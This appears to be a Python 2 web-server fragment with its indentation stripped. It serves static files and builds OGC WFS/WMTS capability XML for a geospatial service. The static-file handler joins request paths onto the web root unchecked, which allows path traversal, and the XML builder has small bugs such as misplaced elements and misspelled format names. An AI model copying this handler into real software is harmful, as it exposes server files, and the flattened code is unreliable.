global gRequests, gRequest
if gRequests is None:
gRequests = local()
gRequest = LocalProxy(lambda: gRequests.request)
gRequests.request = Request(environ)
yield
gRequests.request = None
def init_global():
global ENCODING, ENCODING1, STATICRESOURCE_DIR, STATICRESOURCE_CSS_DIR, STATICRESOURCE_JS_DIR, STATICRESOURCE_IMG_DIR, UPLOAD_PHOTOS_DIR, UPLOAD_VOICE_DIR
global gConfig, gStaticCache, gGreenlets, gClusterProcess, gSecurityConfig, gJoinableQueue
ENCODING = 'utf-8'
ENCODING1 = 'gb18030'
STATICRESOURCE_DIR = os.path.join(module_path(), 'static')
#CONFIGFILE = os.path.join(module_path(), 'ogc-config.ini')
#gConfig = configobj.ConfigObj(db_util.CONFIGFILE, encoding='UTF8')
gConfig = db_util.gConfig
if gConfig['web'].has_key('webroot') and len(gConfig['web']['webroot'])>0:
if os.path.exists(gConfig['web']['webroot']):
STATICRESOURCE_DIR = gConfig['web']['webroot']
STATICRESOURCE_CSS_DIR = os.path.join(STATICRESOURCE_DIR, 'css')
STATICRESOURCE_JS_DIR = os.path.join(STATICRESOURCE_DIR, 'js')
STATICRESOURCE_IMG_DIR = os.path.join(STATICRESOURCE_DIR, 'img')
UPLOAD_PHOTOS_DIR = os.path.join(STATICRESOURCE_DIR,'photos', 'upload')
UPLOAD_VOICE_DIR = os.path.join(STATICRESOURCE_DIR,'voice')
if gConfig['wsgi']['application'].lower() == 'authorize_platform':
gSecurityConfig = db_util.mongo_find_one(gConfig['authorize_platform']['mongodb']['database'],
gConfig['authorize_platform']['mongodb']['collection_security_config'],
{},
'authorize_platform'
)
if gSecurityConfig is None:
gSecurityConfig = {}
if gConfig['wsgi']['application'].lower() in ['pay_platform', 'fake_gateway_alipay']:
gJoinableQueue = gevent.queue.JoinableQueue(maxsize=int(gConfig['pay_platform']['queue']['max_queue_size']))
l = db_util.mongo_find(gConfig['pay_platform']['mongodb']['database'],
gConfig['pay_platform']['mongodb']['collection_config'],
{},
0,
'pay_platform'
)
for i in l:
del i['_id']
key = i.keys()[0]
gSecurityConfig[key] = i[key]
if len(l) == 0:
gSecurityConfig = {}
if gConfig['wsgi']['application'].lower() == 'chat_platform':
gJoinableQueue = gevent.queue.JoinableQueue(maxsize=int(gConfig['chat_platform']['queue']['max_queue_size']))
def handle_static(environ, aUrl):
global ENCODING, gConfig
global STATICRESOURCE_DIR, STATICRESOURCE_JS_DIR, STATICRESOURCE_CSS_DIR, STATICRESOURCE_IMG_DIR, UPLOAD_VOICE_DIR
statuscode, contenttype, body = '404 Not Found', 'text/plain;charset=' + ENCODING, '404 Not Found'
surl = dec(aUrl)#.replace('//', '').replace('/', os.path.sep)
if surl[0:2] == '//':
surl = surl[2:]
if surl[0] == '/':
surl = surl[1:]
p = os.path.join(STATICRESOURCE_DIR , surl)
isBin = False
ext = os.path.splitext(p)[1]
if '.' in surl:
ext = surl[surl.rindex('.'):]
else:
ext = os.path.splitext(p)[1]
print('handle_static p=%s' % p)
if len(ext)>0:
if gConfig['mime_type'].has_key(ext):
if 'image/' in gConfig['mime_type'][ext]:
isBin = True
if '/octet-stream' in gConfig['mime_type'][ext]:
isBin = True
if '/pdf' in gConfig['mime_type'][ext]:
isBin = True
contenttype = gConfig['mime_type'][ext]
if ext == '.js':
if not os.path.exists(p):
p = os.path.join(STATICRESOURCE_JS_DIR, aUrl[aUrl.rindex('/')+1:])
elif ext == '.css':
if not os.path.exists(p):
p = os.path.join(STATICRESOURCE_CSS_DIR, aUrl[aUrl.rindex('/')+1:])
elif 'image/' in gConfig['mime_type'][ext]:
if not os.path.exists(p):
p = os.path.abspath(os.path.join(STATICRESOURCE_IMG_DIR, aUrl[aUrl.rindex('/')+1:]))
if not os.path.exists(p):
p = os.path.join(STATICRESOURCE_DIR , aUrl)
#p = os.path.abspath(p)
p = dec(p)
if os.path.exists(p):
statuscode = '200 OK'
mode = 'r'
if isBin:
mode = 'rb'
with open(p, mode) as f:
f1 = gevent.fileobject.FileObjectThread(f, mode)
body = f1.read()
else:
statuscode = '404 Not Found'
body = '404 Not Found'
else:
contenttype = 'application/octet-stream'
if os.path.exists(p):
statuscode = '200 OK'
with open(p, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
body = f1.read()
else:
if ext == '.3gp':
id = surl[surl.rindex('/') + 1:]
id = id.replace('.3gp', '')
fn = get_voice_file_latest(id)
if fn:
with open(os.path.join(UPLOAD_VOICE_DIR, fn), 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
body = f1.read()
statuscode = '200 OK'
else:
contenttype = 'text/plain;charset=' + ENCODING
statuscode = '500 Internal Server Error'
body = '500 Internal Server Error'
headers = {}
headers['Content-Type'] = str(contenttype)
return statuscode, headers, body
def handle_wfs_GetCapabilities(params):
headers = {}
headers['Content-Type'] = 'text/xml;charset=' + ENCODING
s = create_wfs_GetCapabilities()
return '200 OK', headers, s
def handle_wfs_GetFeature(params):
headers = {}
headers['Content-Type'] = 'text/xml;charset=' + ENCODING
s = create_wfs_GetFeature()
return '200 OK', headers, s
def create_wfs_GetCapabilities():
namespace = {'ows':"http://www.opengis.net/ows",
'ogc':"http://www.opengis.net/ogc",
'wfs':"http://www.opengis.net/wfs",
'gml':"http://www.opengis.net/gml",
'xlink':"http://www.w3.org/1999/xlink",
'xsi':"http://www.w3.org/2001/XMLSchema-instance",
'schemaLocation':"http://www.opengis.net/wfs/1.1.0/WFS.xsd",
'my':"http://localhost:88/my"
}
wfs = '{%s}' % namespace['wfs']
ogc = '{%s}' % namespace['ogc']
ows = '{%s}' % namespace['ows']
xlink = '{%s}' % namespace['xlink']
root = etree.Element(wfs+"WFS_Capabilites", xmlns="http://www.opengis.net/wfs", nsmap=namespace, version="1.1.0", updateSequence="0")
#ServiceIdentification
ServiceIdentification = etree.SubElement(root, ows + "ServiceIdentification")
Title = etree.SubElement(ServiceIdentification, ows + "Title").text = gConfig['wfs']['ServiceIdentification_Title']
ServiceType = etree.SubElement(ServiceIdentification, ows + "ServiceType").text = 'WFS'
ServiceTypeVersion = etree.SubElement(ServiceIdentification, ows + "ServiceTypeVersion").text = '1.1.0'
#OperationsMetadata
OperationsMetadata = etree.SubElement(root, ows + "OperationsMetadata")
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetCapabilities")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
href = xlink + 'href'
Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['wfs']['url']})
#Constraint= etree.SubElement(Get, ows + "Constraint", name="GetEncoding")
#AllowedValues= etree.SubElement(Constraint, ows + "AllowedValues")
#Value= etree.SubElement(AllowedValues, ows + "Value").text = 'KVP'
#Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetTile")
#DCP= etree.SubElement(Operation, ows + "DCP")
#HTTP= etree.SubElement(DCP, ows + "HTTP")
#Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['wmts']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="AcceptVersions")
Value = etree.SubElement(Parameter, ows + "Value").text = "1.1.0"
Value = etree.SubElement(Parameter, ows + "Value").text = "1.0.0"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="AcceptFormats")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="Sections")
Value = etree.SubElement(Parameter, ows + "Value").text = "ServiceIdentification"
Value = etree.SubElement(Parameter, ows + "Value").text = "OperationsMetadata"
Value = etree.SubElement(Parameter, ows + "Value").text = "FeatureTypeList"
Value = etree.SubElement(Parameter, ows + "Value").text = "ServesGMLObjectTypeList"
Value = etree.SubElement(Parameter, ows + "Value").text = "SupportsGMLObjectTypeList"
Value = etree.SubElement(Parameter, ows + "Value").text = "Filter_Capabilities"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="DescribeFeatureType")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['wfs']['url']})#+'/wfs.cgi?'})
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})#+'/wfs.cgi'})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="outputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetFeature")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['wfs']['url']})#+'/wfs.cgi?'})
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})#+'/wfs.cgi'})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="resultType")
Value = etree.SubElement(Parameter, ows + "Value").text = "results"
Value = etree.SubElement(Parameter, ows + "Value").text = "hits"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="outputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetFeatureWithLock")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="resultType")
Value = etree.SubElement(Parameter, ows + "Value").text = "results"
Value = etree.SubElement(Parameter, ows + "Value").text = "hits"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="outputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetGMLObject")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="outputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xhtml"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="LocalTraverseXLinkScope")
Value = etree.SubElement(Parameter, ows + "Value").text = "0"
Value = etree.SubElement(Parameter, ows + "Value").text = "*"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="RemoteTraverseXLinkScope")
Value = etree.SubElement(Parameter, ows + "Value").text = "0"
Value = etree.SubElement(Parameter, ows + "Value").text = "*"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="LockFeature")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="lockAction")
Value = etree.SubElement(Parameter, ows + "Value").text = "ALL"
Value = etree.SubElement(Parameter, ows + "Value").text = "SOME"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="Transaction")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="inputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="idgen")
Value = etree.SubElement(Parameter, ows + "Value").text = "GenerateNew"
Value = etree.SubElement(Parameter, ows + "Value").text = "UseExisting"
Value = etree.SubElement(Parameter, ows + "Value").text = "ReplaceDuplicate"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="releaseAction")
Value = etree.SubElement(Parameter, ows + "Value").text = "ALL"
Value = etree.SubElement(Parameter, ows + "Value").text = "SOME"
Parameter = etree.SubElement(OperationsMetadata, ows + "Parameter", name="srsName")
Value = etree.SubElement(Parameter, ows + "Value").text = "EPSG:4326"
Constraint = etree.SubElement(OperationsMetadata, ows + "Constraint", name="DefaultMaxFeatures")
Value = etree.SubElement(Constraint, ows + "Value").text = "10000"
Constraint = etree.SubElement(OperationsMetadata, ows + "Constraint", name="LocalTraverseXLinkScope")
Value = etree.SubElement(Constraint, ows + "Value").text = "0"
Value = etree.SubElement(Constraint, ows + "Value").text = "*"
Constraint = etree.SubElement(OperationsMetadata, ows + "Constraint", name="RemoteTraverseXLinkScope")
Value = etree.SubElement(Constraint, ows + "Value").text = "0"
Value = etree.SubElement(Constraint, ows + "Value").text = "*"
Constraint = etree.SubElement(OperationsMetadata, ows + "Constraint", name="DefaultLockExpiry")
Value = etree.SubElement(Constraint, ows + "Value").text = "5"
FeatureTypeList = etree.SubElement(root, wfs + "FeatureTypeList")
FeatureType = etree.SubElement(FeatureTypeList, wfs + "FeatureType")
Name = etree.SubElement(FeatureType, wfs + "Name").text = "PointType"
Title = etree.SubElement(FeatureType, wfs + "Title").text = "Point Type"
DefaultSRS = etree.SubElement(FeatureType, wfs + "DefaultSRS").text = "EPSG:4326"
OutputFormats = etree.SubElement(FeatureType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
WGS84BoundingBox = etree.SubElement(FeatureType, ows + "WGS84BoundingBox")
LowerCorner = etree.SubElement(WGS84BoundingBox, ows + "LowerCorner").text = "-180 -90"
UpperCorner = etree.SubElement(WGS84BoundingBox, ows + "UpperCorner").text = "180 90"
ServesGMLObjectTypeList = etree.SubElement(root, wfs + "ServesGMLObjectTypeList")
GMLObjectType = etree.SubElement(ServesGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "PointType"
Title = etree.SubElement(GMLObjectType, wfs + "Title").text = "Point Type"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
SupportsGMLObjectTypeList = etree.SubElement(root, wfs + "SupportsGMLObjectTypeList")
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:AbstractGMLFeatureType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:PointType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:LineStringType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:PolygonType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:MultiPointType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:MultiCurveType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:MultiSurfaceType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:AbstractMetaDataType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:AbstractTopologyType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
Filter_Capabilities = etree.SubElement(root, ogc + "Filter_Capabilities")
Spatial_Capabilities = etree.SubElement(Filter_Capabilities, ogc + "Spatial_Capabilities")
GeometryOperands = etree.SubElement(Spatial_Capabilities, ogc + "GeometryOperands")
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Envelope"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Point"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:LineString"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Polygon"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:ArcByCenterPoint"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:CircleByCenterPoint"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Arc"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Circle"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:ArcByBulge"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Bezier"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Clothoid"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:CubicSpline"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Geodesic"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:OffsetCurve"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Triangle"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:PolyhedralSurface"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:TriangulatedSurface"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Tin"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Solid"
SpatialOperators = etree.SubElement(Spatial_Capabilities, ogc + "SpatialOperators")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="BBOX")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="Equals")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="Disjoint")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="Intersects")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="Touches")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="Crosses")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="Within")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="Contains")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="Overlaps")
SpatialOperator = etree.SubElement(GeometryOperands, ogc + "SpatialOperator", name="Beyond")
Scalar_Capabilities = etree.SubElement(Filter_Capabilities, ogc + "Scalar_Capabilities")
LogicalOperators = etree.SubElement(Scalar_Capabilities, ogc + "LogicalOperators")
ComparisonOperators = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperators")
ComparisonOperator = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperator").text = "LessThan"
ComparisonOperator = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperator").text = "GreaterThan"
ComparisonOperator = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperator").text = "LessThanEqualTo"
ComparisonOperator = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperator").text = "GreaterThanEqualTo"
ComparisonOperator = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperator").text = "EqualTo"
ComparisonOperator = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperator").text = "NotEqualTo"
ComparisonOperator = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperator").text = "Like"
ComparisonOperator = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperator").text = "Between"
ComparisonOperator = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperator").text = "NullCheck"
ArithmeticOperators = etree.SubElement(Scalar_Capabilities, ogc + "ArithmeticOperators")
SimpleArithmetic = etree.SubElement(ArithmeticOperators, ogc + "SimpleArithmetic")
Functions = etree.SubElement(ArithmeticOperators, ogc + "Functions")
FunctionNames = etree.SubElement(Functions, ogc + "FunctionNames")
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "MIN"
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "MAX"
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "SIN"
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "COS"
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "TAN"
Id_Capabilities = etree.SubElement(Filter_Capabilities, ogc + "Id_Capabilities")
EID = etree.SubElement(Id_Capabilities, ogc + "EID")
FID = etree.SubElement(Id_Capabilities, ogc + "FID")
#WGS84BoundingBox = etree.SubElement(Layer, ows + "WGS84BoundingBox")
#SupportedCRS = etree.SubElement(TileMatrixSet, ows + "SupportedCRS" ).text = gConfig['wmts']['SupportedCRS']
ret = etree.tostring(root, pretty_print=True, xml_declaration=True, encoding=ENCODING)
print(ret)
return ret
def handle_wmts_GetCapabilities(params={}):
headers = {}
mimetype = 'text/xml;charset=' + ENCODING
s = ''
if params.has_key('TILETYPE') and params.has_key('SUBTYPE'):
s = create_wmts_GetCapabilities(params['TILETYPE'], params['SUBTYPE'])
return mimetype, s
def create_wmts_GetCapabilities(tiletype, subtype):
global gConfig
#'''
#namespace = {'ows':"http://www.opengis.net/ows/1.1", 'xlink':"http://www.w3.org/1999/xlink", 'xsi':"http://www.w3.org/2001/XMLSchema-instance", 'gml':"http://www.opengis.net/gml", 'schemaLocation':"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd"}
#ows = '{%s}' % namespace['ows']
#xlink = '{%s}' % namespace['xlink']
#root = etree.Element("Capabilities", xmlns="http://www.opengis.net/wmts/1.0", nsmap=namespace, version="1.0.0")
##ServiceIdentification
#ServiceIdentification = etree.SubElement(root, ows + "ServiceIdentification")
#Title = etree.SubElement(ServiceIdentification, ows + "Title").text = gConfig['webgis']['wmts']['ServiceIdentification_Title']
#ServiceType = etree.SubElement(ServiceIdentification, ows + "ServiceType").text = 'OGC WMTS'
#ServiceTypeVersion = etree.SubElement(ServiceIdentification, ows + "ServiceTypeVersion").text = '1.0.0'
##OperationsMetadata
#OperationsMetadata = etree.SubElement(root, ows + "OperationsMetadata")
#Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetCapabilities")
#DCP= etree.SubElement(Operation, ows + "DCP")
#HTTP= etree.SubElement(DCP, ows + "HTTP")
#href = xlink + 'href'
#Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['webgis']['wmts']['url'] + '?'})
#Constraint= etree.SubElement(Get, ows + "Constraint", name="GetEncoding")
#AllowedValues= etree.SubElement(Constraint, ows + "AllowedValues")
#Value= etree.SubElement(AllowedValues, ows + "Value").text = 'KVP'
#Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetTile")
#DCP= etree.SubElement(Operation, ows + "DCP")
#HTTP= etree.SubElement(DCP, ows + "HTTP")
#Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['webgis']['wmts']['url'] + '?'})
##Contents
#Contents = etree.SubElement(root, "Contents")
#Layer = etree.SubElement(Contents, "Layer")
#Title = etree.SubElement(Layer, ows + "Title").text = gConfig['webgis']['wmts']['Layer_Title']
#WGS84BoundingBox = etree.SubElement(Layer, ows + "WGS84BoundingBox")
#LowerCorner = etree.SubElement(WGS84BoundingBox, ows + "LowerCorner").text = gConfig['webgis']['wmts']['WGS84BoundingBox']['LowerCorner']
#UpperCorner = etree.SubElement(WGS84BoundingBox, ows + "UpperCorner").text = gConfig['webgis']['wmts']['WGS84BoundingBox']['UpperCorner']
#Identifier = etree.SubElement(Layer, ows + "Identifier").text = gConfig['webgis']['wmts']['Layer_Identifier']
#Style = etree.SubElement(Layer, "Style", isDefault="true")
#Title = etree.SubElement(Style, ows + "Title" ).text = 'Default'
#Identifier = etree.SubElement(Style, ows + "Identifier" ).text = 'default'
#Format = etree.SubElement(Layer, "Format" ).text = gConfig['mime_type'][gConfig['wmts']['format']]
#TileMatrixSetLink = etree.SubElement(Layer, "TileMatrixSetLink" )
#TileMatrixSet = etree.SubElement(TileMatrixSetLink, "TileMatrixSet" ).text = gConfig['webgis']['wmts']['TileMatrixSet']
#TileMatrixSet = etree.SubElement(Contents, "TileMatrixSet")
#Identifier = etree.SubElement(TileMatrixSet, ows + "Identifier" ).text = gConfig['webgis']['wmts']['TileMatrixSet']
#SupportedCRS = etree.SubElement(TileMatrixSet, ows + "SupportedCRS" ).text = gConfig['webgis']['wmts']['SupportedCRS']
#WellKnownScaleSet = etree.SubElement(TileMatrixSet, "WellKnownScaleSet" ).text = gConfig['webgis']['wmts']['WellKnownScaleSet']
#max_zoom_level, min_zoom_level = int(gConfig['wmts']['max_zoom_level']), int(gConfig['webgis']['wmts']['min_zoom_level'])
#if max_zoom_level < min_zoom_level:
#max_zoom_level, min_zoom_level = min_zoom_level, max_zoom_level
##zoomlist = range(max_zoom_level,min_zoom_level, -1)
#zoomlist = range(min_zoom_level, max_zoom_level+1, 1)
#pixelSize = float(gConfig['webgis']['wmts']['pixelSize'])
#tileWidth,tileHeight = int(gConfig['webgis']['wmts']['TileWidth']), int(gConfig['webgis']['wmts']['TileHeight'])
#minLonLat,maxLonLat = (float(gConfig['webgis']['wmts']['minLonLat'][0]), float(gConfig['webgis']['wmts']['minLonLat'][1])), (float(gConfig['webgis']['wmts']['maxLonLat'][0]), float(gConfig['webgis']['wmts']['maxLonLat'][1]))
##tileMatrixMinX, tileMatrixMaxX = (26.0, 102.0), (26.0, 104.0)
##tileMatrixMinY, tileMatrixMaxY = (24.0, 102.0), (26.0, 102.0)
#tileMatrixMinX, tileMatrixMaxX = (maxLonLat[1], minLonLat[0]), (maxLonLat[1], maxLonLat[0])
#tileMatrixMinY, tileMatrixMaxY = (minLonLat[1], minLonLat[0]), (maxLonLat[1], minLonLat[0])
#metersPerUnit = 0.0
#if gConfig['webgis']['wmts'].has_key('metersPerUnit'):
#metersPerUnit = float(gConfig['webgis']['wmts']['metersPerUnit'])
#else:
#metersPerUnitX = mapUtils.countDistanceFromLatLon(tileMatrixMaxX , tileMatrixMinX)/2*1000
##print('metersPerUnitX=%f' % metersPerUnitX)
#metersPerUnitY = mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY)/2*1000
##print('metersPerUnitY=%f' % metersPerUnitY)
#metersPerUnit = metersPerUnitY
##print('metersPerUnit=%f' % metersPerUnit)
#for i in zoomlist:
##matrixHeight = matrixWidth = mapUtils.tiles_on_level(i)
#matrixHeight = matrixWidth = mapUtils.tiles_on_level(max_zoom_level-(i-1))
##print('%d=%d' % (i , matrixHeight))
##scaleDenominatorX = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxX , tileMatrixMinX) * 1000./(tileWidth * matrixWidth)
##scaleDenominatorY = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) * 1000./(tileHeight * matrixHeight)
##print('scaleDenominatorX=%f, scaleDenominatorY=%f' % (scaleDenominatorX, scaleDenominatorY))
